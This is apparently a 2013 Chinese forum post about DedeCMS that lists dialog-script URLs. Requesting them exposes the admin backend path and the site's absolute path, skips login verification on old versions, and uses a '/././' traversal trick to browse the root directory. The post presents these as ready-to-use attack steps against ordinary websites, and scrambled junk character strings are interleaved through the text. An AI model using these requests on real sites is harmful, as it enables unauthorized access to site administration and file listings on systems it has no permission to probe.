1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理3 P2 G* ~! p3 G- L5 `7 f1 e
; X. M$ x- z ^: }6 \" s
员帐号,新版本的就直接转向了后台.; B7 F$ P& {) E$ o5 O. ^7 J- y
6 A4 T# o, }1 v/ ?6 m+ v& X7 D2.include/dialog/config.php会爆出后台管理路径
9 q; W. _7 Q5 o: u3 {/ v2 U7 ]% ^8 B. C p# }, _+ i0 P% j: ]
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
, Z, K6 O' U- f+ c' q4 k
6 ?& e/ L# Y& D% m$ d% V7 h4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
: |* ]& B$ g; ?2 L* j/ J- h! {; t: Y8 W5 _2 D V4 @
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
5 W0 {+ _" o) `+ h" R) _: }& W# E) P% R9 d$ Q" }9 H4 U
到根目录去.不过这些版本的访问地址有些不同.4 W! K9 H3 v6 {) S$ h
地址为require/dialog/select_soft.php?activepath=/././././././././
1 X5 ]( q3 a/ k H9 ]. E/ T' a) h) e' L$ o, H4 R! V1 ~" `7 X* V
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦.. n* k7 f& G* j4 M4 P
存在相同问题的文件还有
+ n+ t0 E; m H) l% vinclude\dialog\select_images.php' }4 S: j! }# _1 v% V. v
include\dialog\select_media.php
0 u, B0 ]- [. N# B' Ginclude\dialog\select_templets.php- E3 m1 _- A0 z: R9 X' e8 c
|
发表于 2013-4-16 16:50:43
收藏
支持
反对